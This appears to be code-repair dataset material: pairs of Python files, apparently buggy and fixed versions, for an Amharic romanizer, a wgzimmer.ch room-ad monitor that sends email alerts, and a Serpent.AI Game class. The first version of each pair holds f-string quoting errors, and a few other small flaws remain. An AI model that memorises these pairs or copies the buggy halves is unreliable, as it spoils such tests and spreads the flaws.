# Reference: https://www.loc.gov/catdir/cpso/romanization/amharic.pdf
_transliteration = {
# Syllables
'ሀ': ['ha'],
'ሁ': ['hu'],
'ሂ': ['hi'],
'ሃ': ['hā'],
'ሄ': ['hé'],
'ህ': ['he', 'h'],
'ሆ': ['ho'],
'ለ': ['la'],
'ሉ': ['lu'],
'ሊ': ['li'],
'ላ': ['lā'],
'ሌ': ['lé'],
'ል': ['le', 'l'],
'ሎ': ['lo'],
'ሐ': ['ḥa'],
'ሑ': ['ḥu'],
'ሒ': ['ḥi'],
'ሓ': ['ḥā'],
'ሔ': ['ḥé'],
'ሕ': ['ḥe', 'ḥ'],
'ሖ': ['ḥo'],
'መ': ['ma'],
'ሙ': ['mu'],
'ሚ': ['mi'],
'ማ': ['mā'],
'ሜ': ['mé'],
'ም': ['me', 'm'],
'ሞ': ['mo'],
'ሠ': ['śa'],
'ሡ': ['śu'],
'ሢ': ['śi'],
'ሣ': ['śā'],
'ሤ': ['śé'],
'ሥ': ['śe', 'ś'],
'ሦ': ['śo'],
'ረ': ['ra'],
'ሩ': ['ru'],
'ሪ': ['ri'],
'ራ': ['rā'],
'ሬ': ['ré'],
'ር': ['re', 'r'],
'ሮ': ['ro'],
'ሰ': ['sa'],
'ሱ': ['su'],
'ሲ': ['si'],
'ሳ': ['sā'],
'ሴ': ['sé'],
'ስ': ['se', 's'],
'ሶ': ['so'],
'ሸ': ['ša'],
'ሹ': ['šu'],
'ሺ': ['ši'],
'ሻ': ['šā'],
'ሼ': ['šé'],
'ሽ': ['še', 'š'],
'ሾ': ['šo'],
'ቀ': ['qa'],
'ቁ': ['qu'],
'ቂ': ['qi'],
'ቃ': ['qā'],
'ቄ': ['qé'],
'ቅ': ['qe', 'q'],
'ቆ': ['qo'],
'በ': ['ba'],
'ቡ': ['bu'],
'ቢ': ['bi'],
'ባ': ['bā'],
'ቤ': ['bé'],
'ብ': ['be', 'b'],
'ቦ': ['bo'],
'ተ': ['ta'],
'ቱ': ['tu'],
'ቲ': ['ti'],
'ታ': ['tā'],
'ቴ': ['té'],
'ት': ['te', 't'],
'ቶ': ['to'],
'ቸ': ['ča'],
'ቹ': ['ču'],
'ቺ': ['či'],
'ቻ': ['čā'],
'ቼ': ['čé'],
'ች': ['če', 'č'],
'ቾ': ['čo'],
'ኀ': ['ha'],
'ኁ': ['hu'],
'ኂ': ['hi'],
'ኃ': ['hā'],
'ኄ': ['hé'],
'ኅ': ['he', 'h'],
'ኆ': ['ho'],
'ነ': ['na'],
'ኑ': ['nu'],
'ኒ': ['ni'],
'ና': ['nā'],
'ኔ': ['né'],
'ን': ['ne', 'n'],
'ኖ': ['no'],
'ኘ': ['ña'],
'ኙ': ['ñu'],
'ኚ': ['ñi'],
'ኛ': ['ñā'],
'ኜ': ['ñé'],
'ኝ': ['ñe', 'ñ'],
'ኞ': ['ño'],
'አ': ['ʼa'],
'ኡ': ['ʼu'],
'ኢ': ['ʼi'],
'ኣ': ['ʼā'],
'ኤ': ['ʼé'],
'እ': ['ʼe'],
'ኦ': ['ʼo'],
'ከ': ['ka'],
'ኩ': ['ku'],
'ኪ': ['ki'],
'ካ': ['kā'],
'ኬ': ['ké'],
'ክ': ['ke', 'k'],
'ኮ': ['ko'],
'ኸ': ['xa'],
'ኹ': ['xu'],
'ኺ': ['xi'],
'ኻ': ['xā'],
'ኼ': ['xé'],
'ኽ': ['xe', 'x'],
'ኾ': ['xo'],
'ወ': ['wa'],
'ዉ': ['wu'],
'ዊ': ['wi'],
'ዋ': ['wā'],
'ዌ': ['wé'],
'ው': ['we', 'w'],
'ዎ': ['wo'],
'ዐ': ['ʻa'],
'ዑ': ['ʻu'],
'ዒ': ['ʻi'],
'ዓ': ['ʻā'],
'ዔ': ['ʻé'],
'ዕ': ['ʻe'],
'ዖ': ['ʻo'],
'ዘ': ['za'],
'ዙ': ['zu'],
'ዚ': ['zi'],
'ዛ': ['zā'],
'ዜ': ['zé'],
'ዝ': ['ze', 'z'],
'ዞ': ['zo'],
'ዠ': ['ža'],
'ዡ': ['žu'],
'ዢ': ['ži'],
'ዣ': ['žā'],
'ዤ': ['žé'],
'ዥ,ዥ': ['že', 'ž'],
'ዦ': ['žo'],
'የ': ['ya'],
'ዩ': ['yu'],
'ዪ': ['yi'],
'ያ': ['yā'],
'ዬ': ['yé'],
'ይ': ['ye', 'y'],
'ዮ': ['yo'],
'ደ': ['da'],
'ዱ': ['du'],
'ዲ': ['di'],
'ዳ': ['dā'],
'ዴ': ['dé'],
'ድ': ['de', 'd'],
'ዶ': ['do'],
'ጀ': ['ǧa'],
'ጁ': ['ǧu'],
'ጂ': ['ǧi'],
'ጃ': ['ǧā'],
'ጄ': ['ǧé'],
'ጅ': ['ǧe', 'ǧ'],
'ጆ': ['ǧo'],
'ገ': ['ga'],
'ጉ': ['gu'],
'ጊ': ['gi'],
'ጋ': ['gā'],
'ጌ': ['gé'],
'ግ': ['ge', 'g'],
'ጎ': ['go'],
'ጠ': ['ṭa'],
'ጡ': ['ṭu'],
'ጢ': ['ṭi'],
'ጣ': ['ṭā'],
'ጤ': ['ṭé'],
'ጥ': ['ṭe', 'ṭ'],
'ጦ': ['ṭo'],
'ጨ': ['ċa'],
'ጩ': ['ċu'],
'ጪ': ['ċi'],
'ጫ': ['ċā'],
'ጬ': ['ċé'],
'ጭ': ['ċe', 'ċ'],
'ጮ': ['ċo'],
'ጰ': ['p̣a'],
'ጱ': ['p̣u'],
'ጲ': ['p̣i'],
'ጳ': ['p̣ā'],
'ጴ': ['p̣é'],
'ጵ': ['p̣e', 'p̣'],
'ጶ': ['p̣o'],
'ጸ': ['ṣa'],
'ጹ': ['ṣu'],
'ጺ': ['ṣi'],
'ጻ': ['ṣā'],
'ጼ': ['ṣé'],
'ጽ': ['ṣe', 'ṣ'],
'ጾ': ['ṣo'],
'ፀ': ['ṡa'],
'ፁ': ['ṡu'],
'ፂ': ['ṡi'],
'ፃ': ['ṡā'],
'ፄ': ['ṡé'],
'ፅ': ['ṡe', 'ṡ'],
'ፆ': ['ṡo'],
'ፈ': ['fa'],
'ፉ': ['fu'],
'ፊ': ['fi'],
'ፋ': ['fā'],
'ፌ': ['fé'],
'ፍ': ['fe', 'f'],
'ፎ': ['fo'],
'ፐ': ['pa'],
'ፑ': ['pu'],
'ፒ': ['pi'],
'ፓ': ['pā'],
'ፔ': ['pé'],
'ፕ': ['pe', 'p'],
'ፖ': ['po'],
'ቨ': ['va'],
'ቩ': ['vu'],
'ቪ': ['vi'],
'ቫ': ['vā'],
'ቬ': ['vé'],
'ቭ': ['ve', 'v'],
'ቮ': ['vo'],
# Combinations with w
'ቈ': ['qwa'],
'ቊ': ['qwi'],
'ቋ': ['qwā'],
'ቌ': ['qwé'],
'ቍ': ['qwe'],
'ኈ': ['hwa'],
'ኊ': ['hwi'],
'ኋ': ['hwā'],
'ኌ': ['hwé'],
'ኍ': ['hwe'],
'ኰ': ['kwa'],
'ኲ': ['kwi'],
'ኳ': ['kwā'],
'ኴ': ['kwé'],
'ኵ': ['kwe'],
'ጐ': ['gwa'],
'ጒ': ['gwi'],
'ጓ': ['gwā'],
'ጔ': ['gwé'],
'ጕ': ['gwe'],
# Combinations with wa
'ሏ': ['lwa'],
'ቧ': ['bwa'],
'ዟ': ['zwa'],
'ጧ': ['ṭwā'],
'ሟ': ['mwa'],
'ቷ': ['twa'],
'ዧ': ['žwa'],
'ጯ': ['ċwā'],
'ሯ': ['rwa'],
'ቿ': ['čwa'],
'ጿ': ['ṣwā'],
'ሷ': ['swa'],
'ኗ': ['nwa'],
'ዷ': ['dwa'],
'ፏ': ['fwā'],
'ሿ': ['šwa'],
'ኟ': ['ñwa'],
'ጇ': ['ǧwa'],
# Combinations with ya
'ፘ':['rya'],
'ፙ':['mya'],
'ፚ':['fya'],
# Special initial
'ኧ': ['ă']
}
def romanize(text):
output = ''
for char in text:
try:
output += _transliteration[char][-1]
except KeyError:
output += char
return output
if __name__ == '__main__':
print(f"{romanize("ሰላም እንደምን አለህ?").capitalize()}")
| # Reference: https://www.loc.gov/catdir/cpso/romanization/amharic.pdf
_transliteration = {
# Syllables
'ሀ': ['ha'],
'ሁ': ['hu'],
'ሂ': ['hi'],
'ሃ': ['hā'],
'ሄ': ['hé'],
'ህ': ['he', 'h'],
'ሆ': ['ho'],
'ለ': ['la'],
'ሉ': ['lu'],
'ሊ': ['li'],
'ላ': ['lā'],
'ሌ': ['lé'],
'ል': ['le', 'l'],
'ሎ': ['lo'],
'ሐ': ['ḥa'],
'ሑ': ['ḥu'],
'ሒ': ['ḥi'],
'ሓ': ['ḥā'],
'ሔ': ['ḥé'],
'ሕ': ['ḥe', 'ḥ'],
'ሖ': ['ḥo'],
'መ': ['ma'],
'ሙ': ['mu'],
'ሚ': ['mi'],
'ማ': ['mā'],
'ሜ': ['mé'],
'ም': ['me', 'm'],
'ሞ': ['mo'],
'ሠ': ['śa'],
'ሡ': ['śu'],
'ሢ': ['śi'],
'ሣ': ['śā'],
'ሤ': ['śé'],
'ሥ': ['śe', 'ś'],
'ሦ': ['śo'],
'ረ': ['ra'],
'ሩ': ['ru'],
'ሪ': ['ri'],
'ራ': ['rā'],
'ሬ': ['ré'],
'ር': ['re', 'r'],
'ሮ': ['ro'],
'ሰ': ['sa'],
'ሱ': ['su'],
'ሲ': ['si'],
'ሳ': ['sā'],
'ሴ': ['sé'],
'ስ': ['se', 's'],
'ሶ': ['so'],
'ሸ': ['ša'],
'ሹ': ['šu'],
'ሺ': ['ši'],
'ሻ': ['šā'],
'ሼ': ['šé'],
'ሽ': ['še', 'š'],
'ሾ': ['šo'],
'ቀ': ['qa'],
'ቁ': ['qu'],
'ቂ': ['qi'],
'ቃ': ['qā'],
'ቄ': ['qé'],
'ቅ': ['qe', 'q'],
'ቆ': ['qo'],
'በ': ['ba'],
'ቡ': ['bu'],
'ቢ': ['bi'],
'ባ': ['bā'],
'ቤ': ['bé'],
'ብ': ['be', 'b'],
'ቦ': ['bo'],
'ተ': ['ta'],
'ቱ': ['tu'],
'ቲ': ['ti'],
'ታ': ['tā'],
'ቴ': ['té'],
'ት': ['te', 't'],
'ቶ': ['to'],
'ቸ': ['ča'],
'ቹ': ['ču'],
'ቺ': ['či'],
'ቻ': ['čā'],
'ቼ': ['čé'],
'ች': ['če', 'č'],
'ቾ': ['čo'],
'ኀ': ['ha'],
'ኁ': ['hu'],
'ኂ': ['hi'],
'ኃ': ['hā'],
'ኄ': ['hé'],
'ኅ': ['he', 'h'],
'ኆ': ['ho'],
'ነ': ['na'],
'ኑ': ['nu'],
'ኒ': ['ni'],
'ና': ['nā'],
'ኔ': ['né'],
'ን': ['ne', 'n'],
'ኖ': ['no'],
'ኘ': ['ña'],
'ኙ': ['ñu'],
'ኚ': ['ñi'],
'ኛ': ['ñā'],
'ኜ': ['ñé'],
'ኝ': ['ñe', 'ñ'],
'ኞ': ['ño'],
'አ': ['ʼa'],
'ኡ': ['ʼu'],
'ኢ': ['ʼi'],
'ኣ': ['ʼā'],
'ኤ': ['ʼé'],
'እ': ['ʼe'],
'ኦ': ['ʼo'],
'ከ': ['ka'],
'ኩ': ['ku'],
'ኪ': ['ki'],
'ካ': ['kā'],
'ኬ': ['ké'],
'ክ': ['ke', 'k'],
'ኮ': ['ko'],
'ኸ': ['xa'],
'ኹ': ['xu'],
'ኺ': ['xi'],
'ኻ': ['xā'],
'ኼ': ['xé'],
'ኽ': ['xe', 'x'],
'ኾ': ['xo'],
'ወ': ['wa'],
'ዉ': ['wu'],
'ዊ': ['wi'],
'ዋ': ['wā'],
'ዌ': ['wé'],
'ው': ['we', 'w'],
'ዎ': ['wo'],
'ዐ': ['ʻa'],
'ዑ': ['ʻu'],
'ዒ': ['ʻi'],
'ዓ': ['ʻā'],
'ዔ': ['ʻé'],
'ዕ': ['ʻe'],
'ዖ': ['ʻo'],
'ዘ': ['za'],
'ዙ': ['zu'],
'ዚ': ['zi'],
'ዛ': ['zā'],
'ዜ': ['zé'],
'ዝ': ['ze', 'z'],
'ዞ': ['zo'],
'ዠ': ['ža'],
'ዡ': ['žu'],
'ዢ': ['ži'],
'ዣ': ['žā'],
'ዤ': ['žé'],
'ዥ,ዥ': ['že', 'ž'],
'ዦ': ['žo'],
'የ': ['ya'],
'ዩ': ['yu'],
'ዪ': ['yi'],
'ያ': ['yā'],
'ዬ': ['yé'],
'ይ': ['ye', 'y'],
'ዮ': ['yo'],
'ደ': ['da'],
'ዱ': ['du'],
'ዲ': ['di'],
'ዳ': ['dā'],
'ዴ': ['dé'],
'ድ': ['de', 'd'],
'ዶ': ['do'],
'ጀ': ['ǧa'],
'ጁ': ['ǧu'],
'ጂ': ['ǧi'],
'ጃ': ['ǧā'],
'ጄ': ['ǧé'],
'ጅ': ['ǧe', 'ǧ'],
'ጆ': ['ǧo'],
'ገ': ['ga'],
'ጉ': ['gu'],
'ጊ': ['gi'],
'ጋ': ['gā'],
'ጌ': ['gé'],
'ግ': ['ge', 'g'],
'ጎ': ['go'],
'ጠ': ['ṭa'],
'ጡ': ['ṭu'],
'ጢ': ['ṭi'],
'ጣ': ['ṭā'],
'ጤ': ['ṭé'],
'ጥ': ['ṭe', 'ṭ'],
'ጦ': ['ṭo'],
'ጨ': ['ċa'],
'ጩ': ['ċu'],
'ጪ': ['ċi'],
'ጫ': ['ċā'],
'ጬ': ['ċé'],
'ጭ': ['ċe', 'ċ'],
'ጮ': ['ċo'],
'ጰ': ['p̣a'],
'ጱ': ['p̣u'],
'ጲ': ['p̣i'],
'ጳ': ['p̣ā'],
'ጴ': ['p̣é'],
'ጵ': ['p̣e', 'p̣'],
'ጶ': ['p̣o'],
'ጸ': ['ṣa'],
'ጹ': ['ṣu'],
'ጺ': ['ṣi'],
'ጻ': ['ṣā'],
'ጼ': ['ṣé'],
'ጽ': ['ṣe', 'ṣ'],
'ጾ': ['ṣo'],
'ፀ': ['ṡa'],
'ፁ': ['ṡu'],
'ፂ': ['ṡi'],
'ፃ': ['ṡā'],
'ፄ': ['ṡé'],
'ፅ': ['ṡe', 'ṡ'],
'ፆ': ['ṡo'],
'ፈ': ['fa'],
'ፉ': ['fu'],
'ፊ': ['fi'],
'ፋ': ['fā'],
'ፌ': ['fé'],
'ፍ': ['fe', 'f'],
'ፎ': ['fo'],
'ፐ': ['pa'],
'ፑ': ['pu'],
'ፒ': ['pi'],
'ፓ': ['pā'],
'ፔ': ['pé'],
'ፕ': ['pe', 'p'],
'ፖ': ['po'],
'ቨ': ['va'],
'ቩ': ['vu'],
'ቪ': ['vi'],
'ቫ': ['vā'],
'ቬ': ['vé'],
'ቭ': ['ve', 'v'],
'ቮ': ['vo'],
# Combinations with w
'ቈ': ['qwa'],
'ቊ': ['qwi'],
'ቋ': ['qwā'],
'ቌ': ['qwé'],
'ቍ': ['qwe'],
'ኈ': ['hwa'],
'ኊ': ['hwi'],
'ኋ': ['hwā'],
'ኌ': ['hwé'],
'ኍ': ['hwe'],
'ኰ': ['kwa'],
'ኲ': ['kwi'],
'ኳ': ['kwā'],
'ኴ': ['kwé'],
'ኵ': ['kwe'],
'ጐ': ['gwa'],
'ጒ': ['gwi'],
'ጓ': ['gwā'],
'ጔ': ['gwé'],
'ጕ': ['gwe'],
# Combinations with wa
'ሏ': ['lwa'],
'ቧ': ['bwa'],
'ዟ': ['zwa'],
'ጧ': ['ṭwā'],
'ሟ': ['mwa'],
'ቷ': ['twa'],
'ዧ': ['žwa'],
'ጯ': ['ċwā'],
'ሯ': ['rwa'],
'ቿ': ['čwa'],
'ጿ': ['ṣwā'],
'ሷ': ['swa'],
'ኗ': ['nwa'],
'ዷ': ['dwa'],
'ፏ': ['fwā'],
'ሿ': ['šwa'],
'ኟ': ['ñwa'],
'ጇ': ['ǧwa'],
# Combinations with ya
'ፘ':['rya'],
'ፙ':['mya'],
'ፚ':['fya'],
# Special initial
'ኧ': ['ă']
}
def romanize(text):
output = ''
for char in text:
try:
output += _transliteration[char][-1]
except KeyError:
output += char
return output
if __name__ == '__main__':
print(f"{romanize('ሰላም እንደምን አለህ?').capitalize()}")
|
from bs4 import BeautifulSoup,Tag
import requests
import json
import sys
from datetime import datetime
import re
import time
import yagmail
from config import CITY_NAMES
from config import WGZIMMER_HEADERS
from config import SENDER_EMAIL_ACCOUNT
from config import FREQUENCY
from config import RECEIVER_EMAIL
from config import WGZIMMER_CONDITIONS
from room_entity import WgzimmerRoomEntity
from utils import print_info
from utils import notify_through_email
pre_ads_found = -1
def get_total_ads_number(WGZIMMER_CONDITIONS):
url = "https://www.wgzimmer.ch/en/wgzimmer/search/mate.html?"
print_info("Getting total ads number for lowest price from " + str(WGZIMMER_CONDITIONS["priceMin"]) + " to " + str(WGZIMMER_CONDITIONS["priceMax"]) + " at " + str(WGZIMMER_CONDITIONS["state"]))
print_info("\nForm data submited" + str(WGZIMMER_CONDITIONS))
print_info("\nSending request with post method to" + url + "Headers:" + str(WGZIMMER_HEADERS))
response = requests.post(url, WGZIMMER_CONDITIONS,headers = WGZIMMER_HEADERS)
print_info("\n Response received::::")
soup = BeautifulSoup(response.text, features = "html.parser")
container = soup.find('div',id='container')
script = container.find('script',text=re.compile('total*'))
total_ads_found = int(script.contents[0].split('\"')[-2].split(' ')[1])
return total_ads_found
def wgzimmer_refresh(pre_ads_found):
print(f"\nRefreshing results on Wgimmer website:::{datetime.now()}\n")
total_ads_found = get_total_ads_number(WGZIMMER_CONDITIONS)
msg_change = 'Given the search conditions as below, there has been changes happened on the wgzimmer website\n' \
+ f'Lowest price from {WGZIMMER_CONDITIONS['priceMin']} highest price to {WGZIMMER_CONDITIONS['priceMax']}\n' \
+ f'Place of the property:{WGZIMMER_CONDITIONS['state']}\n Search only students:{WGZIMMER_CONDITIONS['student']}\n' \
+ f'Search permanent room:{WGZIMMER_CONDITIONS['permanent']}\nCurrent number of ads:{total_ads_found}'
if pre_ads_found == -1:
pre_ads_found = total_ads_found
elif pre_ads_found - total_ads_found != 0:
pre_ads_found = total_ads_found
notify_through_email('Changes happened on the wgzimmer website',msg_change)
else:
print("\nNo change detected on wgzimmer website::::\n")
return pre_ads_found
# def wgzimmer_main():
# print("Specify the criterions you need on the Wgzimmer below")
# while True:
# while True:
# WGZIMMER_CONDITIONS["priceMin"] = int(input("Enter you lowest price expected(at least 200 at most 1500):"))
# if WGZIMMER_CONDITIONS["priceMin"] in range(200,1501):
# break
# else:
# print("Price not correct")
# while True:
# WGZIMMER_CONDITIONS["priceMax"] = int(input("Enter you highest price expected(at least 200 at most 1500):"))
# if WGZIMMER_CONDITIONS["priceMax"] in range(200,1501):
# break
# else:
# print("Price not correct")
# if (WGZIMMER_CONDITIONS["priceMin"] <= WGZIMMER_CONDITIONS["priceMax"]):
# break
# else:
# print("Price not correct(lowest price must be higher lower than highest price)")
# print("Choose one of the cities from below")
# for it in CITY_NAMES.keys():
# print(it)
# while True:
# State = input("Type the city name above you want to search for a room:")
# if (State in CITY_NAMES.keys()):
# break
# else:
# print("Illegal selection!!")
# while True:
# WGZIMMER_CONDITIONS["student"] = input("Decide to search for rooms only for students or not(y/n/all)")
# if WGZIMMER_CONDITIONS["student"] == "y":
# WGZIMMER_CONDITIONS["student"] = "true"
# break
# elif WGZIMMER_CONDITIONS["student"] == "n":
# WGZIMMER_CONDITIONS["student"] = "false"
# break
# elif WGZIMMER_CONDITIONS["student"] == "all":
# WGZIMMER_CONDITIONS["student"] = "none"
# break
# print("Illegal selection!!")
# while True:
# Permanent = input("Search for unlimited rooms?(y/n/all)")
# if Permanent == "y":
# Permanent = "true"
# break
# elif Permanent == "n":
# Permanent = "false"
# break
# elif Permanent == "all":
# Permanent = "none"
# break
# print("Illegal selection!!")
#room_entities = get_room_list(WGZIMMER_CONDITIONS["priceMin"],WGZIMMER_CONDITIONS["priceMax"],State,WGZIMMER_CONDITIONS["student"],Permanent)
# while True:
# print(f"\nRefreshing results on Wgimmer website:::{datetime.now()}\n")
# total_ads_found = get_total_ads_number(WGZIMMER_CONDITIONS["priceMin"],WGZIMMER_CONDITIONS["priceMax"],State,WGZIMMER_CONDITIONS["student"],Permanent)
# msg_change = f"Given the search conditions as below, there has been changes happened on the wgzimmer website\nLowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n Place of the property:{State}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n Search permanent room:{Permanent}\nCurrent number of ads:{total_ads_found}"
# if pre_ads_found == -1:
# msg_init = f"Started to monitor changes based on the following conditions:\nLowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n Place of the property:{State}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n Search permanent room:{Permanent}\n Current number of ads:{total_ads_found}"
# notify_through_email(msg_init)
# pre_ads_found = total_ads_found
# elif pre_ads_found - total_ads_found != 0:
# pre_ads_found = total_ads_found
# notify_through_email(msg_change)
# else:
# print("No change detected")
# #Sleep for a constant time
# time.sleep(3600/FREQUENCY)
#print(f"\n {total_ads_found} Rooms found:\n")
#print('{:40}{:25}{:25}'.format('id','From','Until'))
#for entity in room_entities:
# print('{:40}{:25}{:25}'.format(str(entity.id),str(entity.from_date) ,str(entity.until_date))) | from bs4 import BeautifulSoup,Tag
import requests
import json
import sys
from datetime import datetime
import re
import time
import yagmail
from config import CITY_NAMES
from config import WGZIMMER_HEADERS
from config import SENDER_EMAIL_ACCOUNT
from config import FREQUENCY
from config import RECEIVER_EMAIL
from config import WGZIMMER_CONDITIONS
from room_entity import WgzimmerRoomEntity
from utils import print_info
from utils import notify_through_email
pre_ads_found = -1
def get_total_ads_number(WGZIMMER_CONDITIONS):
url = "https://www.wgzimmer.ch/en/wgzimmer/search/mate.html?"
print_info("Getting total ads number for lowest price from " + str(WGZIMMER_CONDITIONS["priceMin"]) + " to " + str(WGZIMMER_CONDITIONS["priceMax"]) + " at " + str(WGZIMMER_CONDITIONS["state"]))
print_info("\nForm data submited" + str(WGZIMMER_CONDITIONS))
print_info("\nSending request with post method to" + url + "Headers:" + str(WGZIMMER_HEADERS))
response = requests.post(url, WGZIMMER_CONDITIONS,headers = WGZIMMER_HEADERS)
print_info("\n Response received::::")
soup = BeautifulSoup(response.text, features = "html.parser")
container = soup.find('div',id='container')
script = container.find('script',text=re.compile('total*'))
total_ads_found = int(script.contents[0].split('\"')[-2].split(' ')[1])
return total_ads_found
def wgzimmer_refresh(pre_ads_found):
print(f"\nRefreshing results on Wgimmer website:::{datetime.now()}\n")
total_ads_found = get_total_ads_number(WGZIMMER_CONDITIONS)
msg_change = 'Given the search conditions as below, there has been changes happened on the wgzimmer website\n' \
+ f'Lowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n' \
+ f'Place of the property:{WGZIMMER_CONDITIONS["state"]}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n' \
+ f'Search permanent room:{WGZIMMER_CONDITIONS["permanent"]}\nCurrent number of ads:{total_ads_found}'
if pre_ads_found == -1:
pre_ads_found = total_ads_found
elif pre_ads_found - total_ads_found != 0:
pre_ads_found = total_ads_found
notify_through_email('Changes happened on the wgzimmer website',msg_change)
else:
print("\nNo change detected on wgzimmer website::::\n")
return pre_ads_found
# def wgzimmer_main():
# print("Specify the criterions you need on the Wgzimmer below")
# while True:
# while True:
# WGZIMMER_CONDITIONS["priceMin"] = int(input("Enter you lowest price expected(at least 200 at most 1500):"))
# if WGZIMMER_CONDITIONS["priceMin"] in range(200,1501):
# break
# else:
# print("Price not correct")
# while True:
# WGZIMMER_CONDITIONS["priceMax"] = int(input("Enter you highest price expected(at least 200 at most 1500):"))
# if WGZIMMER_CONDITIONS["priceMax"] in range(200,1501):
# break
# else:
# print("Price not correct")
# if (WGZIMMER_CONDITIONS["priceMin"] <= WGZIMMER_CONDITIONS["priceMax"]):
# break
# else:
# print("Price not correct(lowest price must be higher lower than highest price)")
# print("Choose one of the cities from below")
# for it in CITY_NAMES.keys():
# print(it)
# while True:
# State = input("Type the city name above you want to search for a room:")
# if (State in CITY_NAMES.keys()):
# break
# else:
# print("Illegal selection!!")
# while True:
# WGZIMMER_CONDITIONS["student"] = input("Decide to search for rooms only for students or not(y/n/all)")
# if WGZIMMER_CONDITIONS["student"] == "y":
# WGZIMMER_CONDITIONS["student"] = "true"
# break
# elif WGZIMMER_CONDITIONS["student"] == "n":
# WGZIMMER_CONDITIONS["student"] = "false"
# break
# elif WGZIMMER_CONDITIONS["student"] == "all":
# WGZIMMER_CONDITIONS["student"] = "none"
# break
# print("Illegal selection!!")
# while True:
# Permanent = input("Search for unlimited rooms?(y/n/all)")
# if Permanent == "y":
# Permanent = "true"
# break
# elif Permanent == "n":
# Permanent = "false"
# break
# elif Permanent == "all":
# Permanent = "none"
# break
# print("Illegal selection!!")
#room_entities = get_room_list(WGZIMMER_CONDITIONS["priceMin"],WGZIMMER_CONDITIONS["priceMax"],State,WGZIMMER_CONDITIONS["student"],Permanent)
# while True:
# print(f"\nRefreshing results on Wgimmer website:::{datetime.now()}\n")
# total_ads_found = get_total_ads_number(WGZIMMER_CONDITIONS["priceMin"],WGZIMMER_CONDITIONS["priceMax"],State,WGZIMMER_CONDITIONS["student"],Permanent)
# msg_change = f"Given the search conditions as below, there has been changes happened on the wgzimmer website\nLowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n Place of the property:{State}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n Search permanent room:{Permanent}\nCurrent number of ads:{total_ads_found}"
# if pre_ads_found == -1:
# msg_init = f"Started to monitor changes based on the following conditions:\nLowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n Place of the property:{State}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n Search permanent room:{Permanent}\n Current number of ads:{total_ads_found}"
# notify_through_email(msg_init)
# pre_ads_found = total_ads_found
# elif pre_ads_found - total_ads_found != 0:
# pre_ads_found = total_ads_found
# notify_through_email(msg_change)
# else:
# print("No change detected")
# #Sleep for a constant time
# time.sleep(3600/FREQUENCY)
#print(f"\n {total_ads_found} Rooms found:\n")
#print('{:40}{:25}{:25}'.format('id','From','Until'))
#for entity in room_entities:
# print('{:40}{:25}{:25}'.format(str(entity.id),str(entity.from_date) ,str(entity.until_date))) |
import warnings
warnings.simplefilter("ignore")
import offshoot
import subprocess
import signal
import shlex
import time
import os, os.path
import atexit
from serpent.game_agent import GameAgent
from serpent.game_launchers import *
from serpent.window_controller import WindowController
from serpent.input_controller import InputController, InputControllers
from serpent.frame_grabber import FrameGrabber
from serpent.game_frame_limiter import GameFrameLimiter
from serpent.sprite import Sprite
from serpent.utilities import clear_terminal, is_windows, SerpentError
import skimage.io
import skimage.color
import numpy as np
from redis import StrictRedis
from serpent.config import config
class GameError(BaseException):
pass
class Game(offshoot.Pluggable):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.config = config.get(f"{self.__class__.__name__}Plugin", dict())
self.platform = kwargs.get("platform")
default_input_controller_backend = InputControllers.NATIVE_WIN32 if is_windows() else InputControllers.PYAUTOGUI
self.input_controller = kwargs.get("input_controller") or default_input_controller_backend
self.window_id = None
self.window_name = kwargs.get("window_name")
self.window_geometry = None
self.dashboard_window_id = None
self.window_controller = WindowController()
self.is_launched = False
self.frame_grabber_process = None
self.frame_transformation_pipeline_string = None
self.game_frame_limiter = GameFrameLimiter(fps=self.config.get("fps", 30))
self.api_class = None
self.api_instance = None
self.environments = dict()
self.environment_data = dict()
self.sprites = self._discover_sprites()
self.redis_client = StrictRedis(**config["redis"])
self.pause_callback_fired = False
self.kwargs = kwargs
@property
@offshoot.forbidden
def game_name(self):
return self.__class__.__name__.replace("Serpent", "").replace("Game", "")
@property
@offshoot.forbidden
def game_launcher(self):
return self.game_launchers.get(self.platform)
@property
@offshoot.forbidden
def game_launchers(self):
return {
"steam": SteamGameLauncher,
"executable": ExecutableGameLauncher,
"web_browser": WebBrowserGameLauncher,
"retroarch": RetroarchGameLauncher
}
@property
@offshoot.expected
def screen_regions(self):
raise NotImplementedError()
@property
@offshoot.forbidden
def api(self):
if self.api_instance is None:
self.api_instance = self.api_class(game=self)
else:
return self.api_instance
@property
@offshoot.forbidden
def is_focused(self):
return self.window_controller.is_window_focused(self.window_id)
@offshoot.forbidden
def launch(self, dry_run=False):
self.before_launch()
if not dry_run:
self.game_launcher().launch(**self.kwargs)
self.after_launch()
@offshoot.forbidden
def relaunch(self, before_relaunch=None, after_relaunch=None):
clear_terminal()
print("")
print("Relaunching the game...")
self.stop_frame_grabber()
time.sleep(1)
if before_relaunch is not None:
before_relaunch()
time.sleep(1)
subprocess.call(shlex.split(f"serpent launch {self.game_name}"))
self.launch(dry_run=True)
self.start_frame_grabber()
self.redis_client.delete(config["frame_grabber"]["redis_key"])
while self.redis_client.llen(config["frame_grabber"]["redis_key"]) == 0:
time.sleep(0.1)
self.window_controller.focus_window(self.window_id)
if after_relaunch is not None:
after_relaunch()
def before_launch(self):
pass
def after_launch(self):
self.is_launched = True
current_attempt = 1
while current_attempt <= 100:
self.window_id = self.window_controller.locate_window(self.window_name)
if self.window_id not in [0, "0"]:
break
time.sleep(0.1)
time.sleep(3)
if self.window_id in [0, "0"]:
raise SerpentError("Game window not found...")
self.window_controller.move_window(self.window_id, 0, 0)
self.dashboard_window_id = self.window_controller.locate_window("Serpent.AI Dashboard")
# TODO: Test on macOS and Linux
if self.dashboard_window_id is not None and self.dashboard_window_id not in [0, "0"]:
self.window_controller.bring_window_to_top(self.dashboard_window_id)
self.window_controller.focus_window(self.window_id)
